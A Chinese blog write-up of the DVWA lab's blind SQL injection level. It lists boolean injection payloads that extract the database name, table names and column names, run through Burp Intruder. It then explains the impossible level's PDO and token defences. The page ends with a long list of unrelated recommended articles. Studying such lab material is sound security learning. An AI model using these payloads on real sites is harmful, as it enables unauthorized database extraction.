幕溪WM
幕溪WM

dvwa靶场通关(八)

第八关:SQL Injection (Blind)

low

这一关是盲注, 所以不能用联合查询了,只能靠一点一点手动盲猜了

dvwa靶场通关(八)_第1张图片

 这里用到length和substr函数

先猜数据库名长度

 1' and length(database())=1#

 用bp抓包,发送到爆破

dvwa靶场通关(八)_第2张图片

 选择攻击位置

dvwa靶场通关(八)_第3张图片

 库名长度应该不会超过五十,所以设置从1到50,增量1dvwa靶场通关(八)_第4张图片

 可以知道,库名长度就是4dvwa靶场通关(八)_第5张图片

知道了长度, 然后就是爆出库名

1' and substr((select database()),1,1)='a'#

 同样的方法爆破库名的第一个字母是d

dvwa靶场通关(八)_第6张图片

 直接选择这两个攻击位置会更快,

1' and substr((select database()),$1$,1)='$a$'#

得出库名为dvwadvwa靶场通关(八)_第7张图片

 接下来猜表名长度

 1' and length((select group_concat(table_name) from information_schema.tables where table_schema=database()))=1#

 得出长度为15,其中包括了逗号,因为group_concat是用逗号把各个表名连接起来的

dvwa靶场通关(八)_第8张图片

 接着爆破表名

1' and substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1)='a'#

 得出表名有:guestbook,usersdvwa靶场通关(八)_第9张图片

 然后是爆出列名

1' and length((select group_concat(column_name) from information_schema.columns where table_name='users'))=1#

1' and substr((select group_concat(column_name) from information_schema.columns where table_name='users'),1,1)='a'#

dvwa靶场通关(八)_第10张图片

 medium

下拉表单,选择一个数,用burp suite抓包,

dvwa靶场通关(八)_第11张图片

 修改id的参数id=1 and 1=1 存在dvwa靶场通关(八)_第12张图片

 id=1 and 1=2,不存在,说明是数字型

 根据low我们已经知道数据库名叫dvwa了,长度为4,我们验证一下,没错

 

 high

输入1 and 1=1, 存在

dvwa靶场通关(八)_第13张图片

 输入1 and 1=2,也存在,说明不是数字型

dvwa靶场通关(八)_第14张图片

 输入1' and 1=1#,存在

输入1' and 1=2#,不存在,说明是字符型

dvwa靶场通关(八)_第15张图片

 验证数据库名长度为4,与上面的操作相同

 dvwa靶场通关(八)_第16张图片

 

impossible

dvwa靶场通关(八)_第17张图片

Impossible级别的代码采用了PDO技术,划清了代码与数据的界限,有效防御SQL注入;

同时只有返回的查询结果数量为1时,才会输出;

利用is_numeric($id)函数来判断输入的id是否是数字or数字字符串,满足条件才知晓query查询语句,

Anti-CSRF token机制的加入了进一步提高了安全性,session_token是随机生成的动态值,每次向服务器请求,客户端都会携带最新从服务端已下发的session_token值向服务器请求作匹配验证,相互匹配才会验证通过

你可能感兴趣的:(dvwa通关,web安全,网络安全,数据库)

  • 找工作,关于OSPF的34道 面试题 搞定面试官 太阁闫辉
    基础理论部分:邻居关系建立1.OSPF报文类型以及每一种报文的作用?(提示:hello作用有4个)答:OSPF报文一共有5种1>Hello:作用:1)发现邻居2)维护邻居关系3)选举DR/BDR4)保证邻居的双向通信2>DBD(Databasedescription)1)选举DR/BDR2)交互数据库摘要信息3>LSR(LSARequest)向对方请求对方有,本地没有的LSA信息4>LSU(LSA
  • 为什么搜索引擎可以检索到网站? 程序员T哥 搜索引擎爬虫网络安全网络爬虫网络协议javapython
    搜索引擎和爬虫,基于百度举例为什么搜索引擎可以快速检索到所有对应页面?搜索引擎能够快速检索到所有对应页面,主要归功于以下几个方面:爬虫技术:自动遍历互联网上的网页。索引:将爬取的网页内容转换成数据结构存储。关键词匹配:检索包含用户输入关键词的网页。页面排名:使用复杂算法对搜索结果排序。数据库技术:处理和存储大量数据。分布式计算:提高处理速度。缓存机制:快速返回热门查询结果。用户行为分析:优化搜索结
  • MySQL数据类型:字符串类型详解 黑风风 MySQL进阶学习mysql数据库
    MySQL数据类型:字符串类型详解在MySQL数据库中,字符串数据类型用于存储各种文本信息。这些数据类型主要包括CHAR、VARCHAR、TEXT和BLOB等。CHAR与VARCHARCHARCHAR类型用于存储固定长度的字符串。它的长度在创建表时就已确定,长度范围从1到255个字符。CHAR类型的特点是读取速度快,因为每条记录占用相同的空间,数据库可以快速定位到具体位置。但是,CHAR类型的缺点
  • SAAS多租户系统的详细设计方案,后台数据库及各类框架详细设计方案-程序员必被的技术 九张算数 数字工匠数据库
    SAAS多租户系统的详细设计方案多租户(Multi-Tenant)架构是一种在单个软件实例中服务多个客户(租户)的设计方式。每个租户的数据和配置是独立的,但共享同一个应用程序和基础设施。设计一个高效的SAAS多租户系统需要考虑以下几个方面:架构设计、后台数据库设计、框架选择、数据隔离、安全性、可扩展性和性能优化。1.架构设计1.1多租户架构模式单实例多租户(SingleInstance,Multi
  • MyBatis注解开发详解 hoypte mybatis
    MyBatis注解开发详解一、前言MyBatis是一个优秀的持久层框架,它支持定制化SQL、存储过程以及高级映射。MyBatis免除了几乎所有的JDBC代码和手动设置参数以及获取结果集。MyBatis可以使用简单的XML或注解来配置和映射原始类型、接口和JavaPOJO(PlainOldJavaObjects,普通的Java对象)为数据库中的记录。在MyBatis中,注解提供了一种更加简洁和直观的
  • thinkphp:数据库多条件查询 25号底片~ thinkphp数据库数据库oraclesql
    一、使用if条件限制查询条件$query=Db::table('wip_operation_plan')->alias('d')->join(['wip_jobs_all'=>'a'],'a.wip_entity_name=d.wip_entity_name')->join(['sf_item_no'=>'c'],'a.primary_item=c.item_no')->field('d.*,c.
  • PostgreSQL 自动(隐式)类型转换,解决类型不匹配报错问题 Nazgul丶戒灵 postgresql数据库
    隐式类型自动转换如果有接触过其他数据库,诸如MySQL、Oracle等都是默认对数据类型进行了隐式的转换,在其他数据库varchar等字符串类型和数字可以进行自动的隐式转换,但是PG确没有这么处理,那么有没有办法让PG也实现这个功能呢?答案是肯定的,经过查看官方提供的文档,发现可以通过PG的自定义类型转换定义自己想要的隐式类型转换,下面给大家提供一个简单地示例具体的应用可以去查看官方的文档,场景还
  • SQL-DCL-数据控制语言 向日葵般的数学人~ SQLsql数据库
    一、DCL-管理用户二、DCL-权限控制一、DCL-管理用户,主要是DBA数据库管理员使用,开发使用较少#1、查询用户usemysql;showtables;descuser;select*fromuser;#host为主机地址,主机地址和用户名确定唯一性#2、创建用户createuser'itcast'@'localhost'identifiedby'123456';#用户itcast在loca
  • mysql容器性能优化_MySQL高级--性能优化 马克love mysql容器性能优化
    1.应用优化1.1使用数据库连接池使用数据库连接池,避免数据库连接频繁的创建和销毁,进而减少资源的消耗,提高数据库的访问性能。1.2减少对MySQL的访问1.2.1避免数据重复检索能一次检索获取到结果,就不要进行俩次检索,减少对数据库的无用重请求。1.2.2增加cache层增加缓存层来减轻数据库负担。可以使用orm框架提供的一级/二级缓存,或者使用redis来缓存数据。1.3负载均衡1.3.1My
  • mysql数据库学习-mysql内存IO性能优化 执笔画情ora MYSQL性能优化数据库mysql学习
    Mysql内存性能优化1CPU模式优化1.7、安装jemalloc,避免原生内存分配器带来的内存碎片问题.cp$basedir/lib/mysql/libjemalloc.so.1/usr/lib64/libjemalloc.so数据库配置文件添加如下[mysqld_safe]malloc-lib=/usr/lib64/libjemalloc.so1.8、修改cpu模式cat/sys/device
  • 网络安全工程师的学习路线 程序员鬼鬼 web安全学习安全开发语言计算机网络网络安全php
    Web安全工程师概念基础一.了解黑客是如何工作的1.在虚拟机配置Linux系统2.漏洞测试工具3.msf控制台4.远程工具RATS5.远程访问计算机6.白帽二.技术基础漏斗扫描工具AWVSAWVS简介安装站点扫描扫码结果分析SitecrawlerHTTPEditorTargetfingerAuthenticationTeaterHTTPSnifferHTTPfuzzer网络安全审计工具:Nmap安
  • java复习宝典,jdbc与mysql数据库 Xiao Tong333 javamysql开发语言
    一.java1.面向对象知识(1)类和对象类:若干具有相同属性和行为的对象的群体或者抽象,类是创建对象的模板,由属性和行为两部分组成。类是对象的概括或者抽象,对象是类的实例化。举例:例如车有很多类型,但是这些都是车,车这个大类就是一个类,每种车都是一个对象。1.类的声明[修饰符]class类名{//类的声明部分[成员变量][成员方法]}员变量的声明:[修饰符]数据类型变量名[=初始值];成员方法的
  • MySQL数据库管理 阿龙的代码在报错 MySQL入门数据库mysqloracle
    MySQL数据库管理命令行操作查看当前数据库:showdatabases创建数据库:createdatabase数据库名defaultcharsetutf8collateutf8_general_ci;删除数据库:dropdatabase数据库名进入数据库:use数据库名指令示例:查看数据库mysql>showdatabases;+--------------------+|Database|+-
  • B+树的原理及实现 eqa11 b树数据结构
    B+树的原理及实现一、引言B+树是一种基于B树的树形数据结构,它在数据库和文件系统的索引中有着广泛的应用。与B树相比,B+树的所有数据记录都存储在叶节点上,并且增加了顺序访问的能力,这使得B+树在处理大量数据时更加高效。二、B+树的特性1、结构特点B+树的每个节点都包含以下两个主要部分:Entry:索引键,用于数据索引,必须是可比较的。Child指针:指向子节点的指针,用于访问子节点。2、节点类型
  • ADO在C++中的使用(数据库的连接) 郭萌萌 MFCsqlserverado.netc++数据库
    最近程序中用到读写数据库,看了些例子,查了番MSDN,下面把详细步骤写出来,以备忘,或与同行共勉。读写数据库的技术很多,现在多用ADO。ADO以COM方式提供,所以它的很多行为遵循COM规范。首先,要引入ADO的COM文件,它的位置一般在"C:/ProgramFiles/CommonFiles/System/ado/msado15.dll"。引入ADO打开预编译头文件StdAfx.h,写上引入声明
  • 第三十三天学习笔记 神效的枫叶c 学习笔记adb
    1.设置主从从mysql57服务器1)配置主数据库[root@msater_5~]#systemctlstopfilewalld[root@msater_5~]#setenforce0[root@msater_5~]#systemctldisablefilewalld[root@msater_5~]#lsanaconda-ks.cfgmysql-5.7.44-linux-glibc2.12-x86
  • (1)Hilt的基本概念和使用 challenge51all jetpackandroidjetpackHilt
    JetpackHilt是一个用于Android的依赖注入框架,它建立在Dagger的基础上,旨在简化Android应用中的依赖注入过程。一、主要作用和优势简化依赖注入Hilt提供了一种声明式的方式来管理应用中的依赖关系。开发人员可以使用注解来标识需要注入的对象和提供依赖的模块,而无需手动编写大量的依赖注入代码。例如,使用Hilt可以轻松地将一个数据库实例注入到一个ViewModel中,而不需要在V
  • 【MySQL数据库管理问答题】第4章 配置 MySQL summer.335 MySQLMySQL数据库管理问答题数据库mysqllinux
    目录1.要显示已配置的服务器选项可以有哪几种方法,分别举例说明。2.使用选项文件有哪些好处?3.给出在Linux系统上的标准选项文件的名称和保存的位置。4.请说明选项文件中的[client]和[server]组的适用范围。5.如果在多个配置文件中指定了一个相同的选项值,或者在同一配置文件内的多个组中指定了相同的选项值,系统如何处理?6.请说明--no-defaults命令行长选项的作用。7.MyS
  • 【MySQL数据库管理问答题】第7章 MySQL 安全 summer.335 MySQLMySQL数据库管理问答题数据库mysql安全
    目录1.哪些常见的措施可以用来防范网络安全风险?2.请对安全套接字层(SSL)和传输层安全性(TLS)协议加以简要得说明。3.请对ca.pem、server-cert.pem、server-key.pem、ca-key.pem、client-cert.pem、client-key.pem这些与SSL有关的文件,分别给出功能说明。4.MySQL8.0企业防火墙都有哪些特点和功能?1.哪些常见的措施可
  • node.js毕业设计基于微信小程序寸金校园租车平台(源码+程序+LW+部署) node-php毕设程序源码 微信小程序node.js课程设计
    该项目含有源码、文档、程序、数据库、配套开发软件、软件安装教程。欢迎交流项目运行环境配置:Node.js+Vscode+Mysql5.7+HBuilderX+Navicat11+Vue+Express。项目技术:Express框架+Node.js+Vue等等组成,B/S模式+Vscode管理+前后端分离等等。环境需要1.运行环境:最好是Nodejs最新版,我们在这个版本上开发的。其他版本理论上也可
  • 微信小程序uniapp+vue电动汽车租赁充电管理系统springboot qq840612233 微信小程序uni-appspringboot
    电动汽车租赁管理系统的开发设计时一个独立的系统,以流行数据库进行数据的存储开发,主要是为了实现电动汽车租赁管理系统的用户角色及相对应的功能模块,让电动汽车租赁管理系统的管理不会存在管理差异、低效率,而是跟传统的管理信息恰好相反,电动汽车租赁管理系统的实现可以节约资源,并且对于业务的处理速度也提高,速度快、效率高,功能性强大。基于Android的电动汽车租赁管理系统的设计基于现有的安卓手机上运行,可
  • 一款好看的EMlog系统博客网站微信小程序源码v1.1 dddaaxx 程序源码
    介绍:这是一个简洁的程序,所以给它取了个英文名叫Brief,需要配合EMlog后端,所以EMlog附带了一款非常好看的大前端模板。Brief使用emlog(6.0.1)系统强力驱动后端API使用张子恒接口文档开发本程序仍有诸多bug未修复由于开发时修改过很多emlog原有功能及数据库所以使用该程序需要重新安装emlog和数据库1、配置ssl宝塔可免费申请2、安装后端上传源码-导入数据库-修改con
  • 玩《黑神话:悟空》怎么解锁这些关卡!第一难大头怪打怪攻略! 嘻嘻数码 数码开放式耳机蓝牙耳机无线蓝牙耳机音视频黑神话悟空
    只要学会了黑神话悟空大头怪怎么打,当大家在游戏中遇见它的时候,就不会感到惊慌失措。因为他的机制以及特性非常奇怪,如果没有准确的攻击正确部位的话。不仅不能对其造成多少伤害,还有可能适得其反,所以学会后就能成功通关。所以这一关真的特别重要,很多人都卡在这里很久,打了一个晚上的妖怪硬是没有过关,这时候如果是戴着普通蓝牙耳机的人估计耳朵都要废了,这酸胀感可想而知,非常建议你们跟我一样换个南卡OEMIX开放
  • 【Mysql数据库基础05】子查询 where、from、exists子查询、分页查询 失舵之舟- #mysql基础数据库mysql数据库系统子查询分页查询where子查询from子查询
    where、from、exists子查询、分页查询1where子查询1.1where后面的标量子查询1.1.1having后的标量子查询1.2where后面的列子查询1.3where后面的行子查询(了解即可)2from子查询3exists子查询(相关子查询)4分页查询5联合查询6练习1where子查询1.1where后面的标量子查询1.谁的工资比Abel高?select*fromemployees
  • 信息技术与教学能力-中学教资备考 潦了个草 笔记
    信息技术与教学能力-干货满满一、基础知识:1.总体来说,一切与信息的获取、加工、表达、交流、管理、应用等有关的技术,都可以称之为信息技术。搜索英文资料,Google较为合适;搜索中文资料时,百度的资源更丰富3.网络数据库管理主要体现了信息的什么特征?(共享性)。4.信息爆炸,是对近几年来信息量快速发展的一种描述,形容其发展的速度如爆炸一般席卷整个地球。信息的增长速度绝对是一件近乎恐怖的事情——我们
  • 【离线安装clickhouse集群】 eddianliu bigdataclickhousecentos
    离线安装clickhouse集群clickhouse介绍Clickhouse是俄罗斯yandex公司于2016年开源的一个列式数据库管理系统,在OLAP领域像一匹黑马一样,以其超高的性能受到业界的青睐。特性:基于shard+replica实现的线性扩展和高可靠采用列式存储,数据类型一致,压缩性能更高硬件利用率高,连续IO,提高了磁盘驱动器的效率向量化引擎与SIMD提高了CPU利用率,多核多节点并行
  • k8s必知必会 小卒曹阿瞒 八股文分布式网络bigdata
    目录1、简述etcd及其特点etcd是CoreOS团队发起的开源项目,是一个管理配置信息和服务发现(servicediscovery)的项目,它的目标是构建一个高可用的分布式键值(key-value)数据库,基于Go语言实现。特点:简单:支持REST风格的HTTP+JSONAPI安全:支持HTTPS方式的访问快速:支持并发1k/s的写操作可靠:支持分布式结构,基于Raft的一致性算法,Raft是一
  • go分析和kegg分析_GO分析和KEGG分析都是啥? weixin_39564151 go分析和kegg分析
    本文原创发布于微信公众号“数据库百科”。未经许可,禁止转载。几乎现在的套路性文章在做完差异表达分析后,都会去做GO和KEGG富集分析。那么GO和KEGG都是什么?富集分析又是个什么东西呢?1为什么做富集分析?在我们进行差异表达分析的时候,我们会得到很多的差异表达基因。这些基因如果只是按照基因名放到哪里的话,我们很难找到一个规律说这些有基因之间有什么关系的。例如下图,我们把这些差异基因平铺来了之后,
  • 第四章 4D评估流程 Chupachuck
    A:团队评估引发改变理性知识不足以促使行为发生改变,而团队评估可以引发行为改变。评估数据会激发我们天性中的竞争部分。为什么4D评估可以提升绩效,关键在于“关注点哪里,能量就流向哪里。”1。可以经常做评估,就能把注意力带到行为上。2。4D评估的教育意义创造了团队的共同语言。3。团队和个人发展评估是以我们数据库中同一类人为基准。4D团队发展评估做测试。最少5人,建议25人,至少一名上司。八项被评估行为
  • django学习入门系列之第九点《案例:员工管理》 铁匠匠匠 djangodjango学习sqlitepython后端开源笔记
    文章目录案例:员工管理创建表结构python操作MySQLpython查询数据python删除数据python修改数据小节往期回顾案例:员工管理使用MySQL内置工具(命令)创建数据库:unicom数据一张表:admin表名:admin列:id,整型,自增,主键。username字符串不为空,pasword字符串不为空,mobile字符串不为空python代码实现:添加用户删除用户查看用户更新用户
  • Dom 周华华 JavaScripthtml
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml&q
  • 【Spark九十六】RDD API之combineByKey bit1129 spark
    1. combineByKey函数的运行机制   RDD提供了很多针对元素类型为(K,V)的API,这些API封装在PairRDDFunctions类中,通过Scala隐式转换使用。这些API实现上是借助于combineByKey实现的。combineByKey函数本身也是RDD开放给Spark开发人员使用的API之一   首先看一下combineByKey的方法说明:
  • msyql设置密码报错:ERROR 1372 (HY000): 解决方法详解 daizj mysql设置密码
    MySql给用户设置权限同时指定访问密码时,会提示如下错误: ERROR 1372 (HY000): Password hash should be a 41-digit hexadecimal number;   问题原因:你输入的密码是明文。不允许这么输入。   解决办法:用select password('你想输入的密码');查询出你的密码对应的字符串, 然后
  • 路漫漫其修远兮 吾将上下而求索 周凡杨 学习 思索
    王国维在他的《人间词话》中曾经概括了为学的三种境界古今之成大事业、大学问者,罔不经过三种之境界。“昨夜西风凋碧树。独上高楼,望尽天涯路。”此第一境界也。“衣带渐宽终不悔,为伊消得人憔悴。”此第二境界也。“众里寻他千百度,蓦然回首,那人却在灯火阑珊处。”此第三境界也。学习技术,这也是你必须经历的三种境界。第一层境界是说,学习的路是漫漫的,你必须做好充分的思想准备,如果半途而废还不如不要开始。这里,注
  • Hadoop(二)对话单的操作 朱辉辉33 hadoop
    Debug: 1、 A = LOAD '/user/hue/task.txt' USING PigStorage(' ') AS (col1,col2,col3); DUMP A; //输出结果前几行示例: (>ggsnPDPRecord(21),,) (-->recordType(0),,) (-->networkInitiation(1),,)
  • web报表工具FineReport常用函数的用法总结(日期和时间函数) 老A不折腾 finereport报表工具web开发
    web报表工具FineReport常用函数的用法总结(日期和时间函数)   说明:凡函数中以日期作为参数因子的,其中日期的形式都必须是yy/mm/dd。而且必须用英文环境下双引号(" ")引用。   DATE DATE(year,month,day):返回一个表示某一特定日期的系列数。 Year:代表年,可为一到四位数。 Month:代表月份。
  • c++ 宏定义中的##操作符 墙头上一根草 C++
    #与##在宏定义中的--宏展开 #include <stdio.h> #define f(a,b) a##b #define g(a)   #a #define h(a) g(a) int main() {       &nbs
  • 分析Spring源代码之,DI的实现 aijuans springDI源代码
    (转) 分析Spring源代码之,DI的实现 2012/1/3 by tony                 接着上次的讲,以下这个sample [java]  view plain copy print
  • for循环的进化 alxw4616 JavaScript
    // for循环的进化 // 菜鸟 for (var i = 0; i < Things.length ; i++) { // Things[i] } // 老鸟 for (var i = 0, len = Things.length; i < len; i++) { // Things[i] } // 大师 for (var i = Things.le
  • 网络编程Socket和ServerSocket简单的使用 百合不是茶 网络编程基础IP地址端口
      网络编程;TCP/IP协议   网络:实现计算机之间的信息共享,数据资源的交换   协议:数据交换需要遵守的一种协议,按照约定的数据格式等写出去   端口:用于计算机之间的通信      每运行一个程序,系统会分配一个编号给该程序,作为和外界交换数据的唯一标识 0~65535   查看被使用的
  • JDK1.5 生产消费者 bijian1013 javathread生产消费者java多线程
    ArrayBlockingQueue:        一个由数组支持的有界阻塞队列。此队列按 FIFO(先进先出)原则对元素进行排序。队列的头部 是在队列中存在时间最长的元素。队列的尾部 是在队列中存在时间最短的元素。新元素插入到队列的尾部,队列检索操作则是从队列头部开始获得元素。 ArrayBlockingQueue的常用方法:
  • JAVA版身份证获取性别、出生日期及年龄 bijian1013 java性别出生日期年龄
            工作中需要根据身份证获取性别、出生日期及年龄,且要还要支持15位长度的身份证号码,网上搜索了一下,经过测试好像多少存在点问题,干脆自已写一个。 CertificateNo.java package com.bijian.study; import java.util.Calendar; import
  • 【Java范型六】范型与枚举 bit1129 java
    首先,枚举类型的定义不能带有类型参数,所以,不能把枚举类型定义为范型枚举类,例如下面的枚举类定义是有编译错的   public enum EnumGenerics<T> { //编译错,提示枚举不能带有范型参数 OK, ERROR; public <T> T get(T type) { return null;
  • 【Nginx五】Nginx常用日志格式含义 bit1129 nginx
    1. log_format 1.1 log_format指令用于指定日志的格式,格式:   log_format name(格式名称) type(格式样式)   1.2 如下是一个常用的Nginx日志格式:   log_format main '[$time_local]|$request_time|$status|$body_bytes
  • Lua 语言 15 分钟快速入门 ronin47 lua 基础
    - - 单行注释 - - [[      [多行注释] - - ]]   - - - - - - - - - - - 1. 变量 & 控制流 - - - - - - - - - - num = 23 - - 数字都是双精度 str = 'aspythonstring'
  • java-35.求一个矩阵中最大的二维矩阵 ( 元素和最大 ) bylijinnan java
    the idea is from: http://blog.csdn.net/zhanxinhang/article/details/6731134 public class MaxSubMatrix { /**see http://blog.csdn.net/zhanxinhang/article/details/6731134 * Q35 求一个矩阵中最大的二维
  • mongoDB文档型数据库特点 开窍的石头 mongoDB文档型数据库特点
    MongoDD: 文档型数据库存储的是Bson文档-->json的二进制 特点:内部是执行引擎是js解释器,把文档转成Bson结构,在查询时转换成js对象。 mongoDB传统型数据库对比    传统类型数据库:结构化数据,定好了表结构后每一个内容符合表结构的。也就是说每一行每一列的数据都是一样的    文档型数据库:不用定好数据结构,
  • [毕业季节]欢迎广大毕业生加入JAVA程序员的行列 comsci java
        一年一度的毕业季来临了。。。。。。。。      正在投简历的学弟学妹们。。。如果觉得学校推荐的单位和公司不适合自己的兴趣和专业,可以考虑来我们软件行业,做一名职业程序员。。。      软件行业的开发工具中,对初学者最友好的就是JAVA语言了,网络上不仅仅有大量的
  • PHP操作Excel – PHPExcel 基本用法详解 cuiyadll PHPExcel
    导出excel属性设置//Include classrequire_once('Classes/PHPExcel.php');require_once('Classes/PHPExcel/Writer/Excel2007.php');$objPHPExcel = new PHPExcel();//Set properties 设置文件属性$objPHPExcel->getProperties
  • IBM Webshpere MQ Client User Issue (MCAUSER) darrenzhu IBMjmsuserMQMCAUSER
    IBM MQ JMS Client去连接远端MQ Server的时候,需要提供User和Password吗? 答案是根据情况而定,取决于所定义的Channel里面的属性Message channel agent user identifier (MCAUSER)的设置。 http://stackoverflow.com/questions/20209429/how-mca-user-i
  • 网线的接法 dcj3sjt126com
    一、PC连HUB (直连线)A端:(标准568B):白橙,橙,白绿,蓝,白蓝,绿,白棕,棕。 B端:(标准568B):白橙,橙,白绿,蓝,白蓝,绿,白棕,棕。 二、PC连PC (交叉线)A端:(568A): 白绿,绿,白橙,蓝,白蓝,橙,白棕,棕; B端:(标准568B):白橙,橙,白绿,蓝,白蓝,绿,白棕,棕。 三、HUB连HUB&nb
  • Vimium插件让键盘党像操作Vim一样操作Chrome dcj3sjt126com chromevim
    什么是键盘党? 键盘党是指尽可能将所有电脑操作用键盘来完成,而不去动鼠标的人。鼠标应该说是新手们的最爱,很直观,指哪点哪,很听话!不过常常使用电脑的人,如果一直使用鼠标的话,手会发酸,因为操作鼠标的时候,手臂不是在一个自然的状态,臂肌会处于绷紧状态。而使用键盘则双手是放松状态,只有手指在动。而且尽量少的从鼠标移动到键盘来回操作,也省不少事。 在chrome里安装 vimium 插件
  • MongoDB查询(2)——数组查询[六] eksliang mongodbMongoDB查询数组
    MongoDB查询数组 转载请出自出处:http://eksliang.iteye.com/blog/2177292 一、概述  MongoDB查询数组与查询标量值是一样的,例如,有一个水果列表,如下所示: > db.food.find() { "_id" : "001", "fruits" : [ "苹
  • cordova读写文件(1) gundumw100 JavaScriptCordova
    使用cordova可以很方便的在手机sdcard中读写文件。 首先需要安装cordova插件:file 命令为: cordova plugin add org.apache.cordova.file 然后就可以读写文件了,这里我先是写入一个文件,具体的JS代码为: var datas=null;//datas need write var directory=&
  • HTML5 FormData 进行文件jquery ajax 上传 到又拍云 ileson jqueryAjaxhtml5FormData
    html5 新东西:FormData  可以提交二进制数据。 页面test.html <!DOCTYPE> <html> <head> <title> formdata file jquery ajax upload</title> </head> <body> <
  • swift appearanceWhenContainedIn:(version1.2 xcode6.4) 啸笑天 version
      swift1.2中没有oc中对应的方法: + (instancetype)appearanceWhenContainedIn:(Class <UIAppearanceContainer>)ContainerClass, ... NS_REQUIRES_NIL_TERMINATION;  解决方法: 在swift项目中新建oc类如下: #import &
  • java实现SMTP邮件服务器 macroli java编程
    电子邮件传递可以由多种协议来实现。目前,在Internet 网上最流行的三种电子邮件协议是SMTP、POP3 和 IMAP,下面分别简单介绍。   ◆ SMTP 协议   简单邮件传输协议(Simple Mail Transfer Protocol,SMTP)是一个运行在TCP/IP之上的协议,用它发送和接收电子邮件。SMTP 服务器在默认端口25上监听。SMTP客户使用一组简单的、基于文本的
  • mongodb group by having where 查询sql qiaolevip 每天进步一点点学习永无止境mongo纵观千象
    SELECT cust_id, SUM(price) as total FROM orders WHERE status = 'A' GROUP BY cust_id HAVING total > 250 db.orders.aggregate( [ { $match: { status: 'A' } }, { $group: {
  • Struts2 Pojo(六) Luob. POJOstrust2
    注意:附件中有完整案例 1.采用POJO对象的方法进行赋值和传值 2.web配置 <?xml version="1.0" encoding="UTF-8"?> <web-app version="2.5" xmlns="http://java.sun.com/xml/ns/javaee&q
  • struts2步骤 wuai struts
    1、添加jar包 2、在web.xml中配置过滤器 <filter>        <filter-name>struts2</filter-name>        <filter-class>org.apache.st
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他